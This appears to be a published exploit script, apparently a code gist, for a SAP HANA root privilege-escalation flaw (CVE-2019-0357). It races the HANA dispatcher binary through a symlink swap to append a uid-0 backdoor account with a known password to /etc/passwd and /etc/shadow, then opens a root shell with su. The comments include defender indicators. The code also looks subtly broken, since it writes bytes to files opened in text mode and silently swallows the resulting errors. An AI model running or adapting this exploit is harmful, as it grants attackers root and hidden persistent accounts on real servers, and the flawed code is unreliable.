@S3cur3Th1sSh1t
Created February 6, 2020 08:04
CVE-2019-0357 - SAP HANA root privilege-escalation vulnerability
import os
import signal
import sys
# Upper bound on race attempts per target file (see race_file_attempts).
ATTEMPTS = (100 * 1000)
# SAP HANA dispatcher binary that the forked child invokes with
# `-s HXE -m 0777` (see race_file).  The script only works if that binary
# acts on `socketfn` with more privilege than the caller has -- presumably
# applying the requested mode to the path and following a symlink there --
# TODO confirm against the CVE-2019-0357 advisory.
bin2exec = "/usr/sap/HXE/HDB90/exe/mdc/hdbmdcdispatcher"
# Path under the instance's ipc directory that race_file unlinks and
# replaces with a symlink to the real target file; the unprivileged user
# must therefore be able to modify this directory.
socketfn = "/var/lib/hdb/HXE/ipc/hdbmdcdispatcher"
# Lines that run() tries to append to /etc/passwd and /etc/shadow: a new
# uid 0 / gid 0 account named "anvil".  The shadow line carries a SHA-512
# crypt hash (`$6$` prefix); run() prints the matching password.
# Defenders: an unexpected uid-0 entry appended to these two files is the
# primary host-level indicator of this technique having succeeded.
passwd_entry = b"anvil:x:0:0:Anvil Ventures:/root:/bin/bash"
shadow_entry = b"anvil:$6$4x3OFPhx$OdAa..WfmrBGhRzEue9iig8." \
    b"vDh8cu6vP2tmSPRsHkylgOYz9xitwqKM/Ql/28f6hO" \
    b"09xkajSJGu3mA7gZL.C/:17950:0:::::"
def add_line_if_not_there(fn, line):
    """Append `line` (plus a newline) to the file at `fn` unless already present.

    The file is read in text mode and searched for `line` as a substring;
    when found nothing is written.  Read and append are two separate opens,
    so a concurrent writer can still produce a duplicate entry.
    """
    with open(fn, "r") as src:
        already_present = line in src.read()
    if already_present:
        return
    with open(fn, "a") as dst:
        dst.write(line + "\n")
def race_file(fn, line):
    """Make one attempt to get `line` appended to `fn` via the dispatcher race.

    Forks: the child runs `bin2exec -s HXE -m 0777` through os.system() and
    exits; the parent concurrently unlinks `socketfn`, replaces it with a
    symlink to `fn`, and calls add_line_if_not_there(fn, line).  Whether the
    append is permitted depends on timing relative to the child -- presumably
    the dispatcher changes the mode of `socketfn`, and through the symlink of
    `fn` -- TODO confirm against the advisory.  This is a classic symlink /
    TOCTOU race; a symlink appearing at `socketfn` or a mode change on
    /etc/shadow is what a defender would watch for.

    Returns True when unlink, symlink and the append all completed without
    raising, False otherwise.  Every exception is swallowed, so a failed
    attempt carries no diagnostic.  The child is always SIGKILLed and reaped.
    """
    newpid = os.fork()
    if newpid == 0:
        # child: run the dispatcher once, then exit.  The exit status is
        # never inspected; os.wait() below only reaps the pid.
        cmd = "%s -s HXE -m 0777" % bin2exec
        os.system(cmd)
        sys.exit(1)
    # parent
    ret = False
    try:
        os.unlink(socketfn)
        os.symlink(fn, socketfn)
        add_line_if_not_there(fn, line)
        ret = True
    except Exception:
        # Any failure (e.g. socketfn missing, or fn not writable) is treated
        # as a lost race; the caller decides whether to retry.
        pass
    # Terminate the child regardless of outcome and reap it so repeated
    # attempts do not accumulate zombies.
    os.kill(newpid, signal.SIGKILL)
    os.wait()
    return ret
def race_file_attempts(fn, line, attempts):
    """Call race_file(fn, line) up to `attempts` times, stopping at first success.

    Afterwards prints how many attempts were used.  The loop index is bumped
    once after the loop so the count is 1-based on success; when no attempt
    succeeds the printed count equals `attempts`.  `n` is never bound when
    `attempts` is 0, so the print would raise UnboundLocalError in that case.
    Nothing is returned, so the caller cannot tell success from exhaustion.
    """
    for n in range(0, attempts):
        if race_file(fn, line):
            break
    n += 1
    print("Needed %i attempts to race and modify %s" % (n, fn))
def run(n):
    """Drive the full sequence: race both account files, then spawn `su`.

    Calls race_file_attempts on /etc/shadow with `shadow_entry` first, then on
    /etc/passwd with `passwd_entry`, each capped at `n` attempts.  Neither
    outcome is checked; `su - anvil` is run unconditionally via os.system(),
    inheriting the terminal so su can prompt for the password printed here.
    """
    race_file_attempts("/etc/shadow", shadow_entry, n)
    race_file_attempts("/etc/passwd", passwd_entry, n)
    print("Now running `su - anvil` for you. Password is `anvil`")
    os.system("su - anvil")
if __name__ == "__main__":
    # Script entry point: run with the module-level attempt cap.
    run(ATTEMPTS)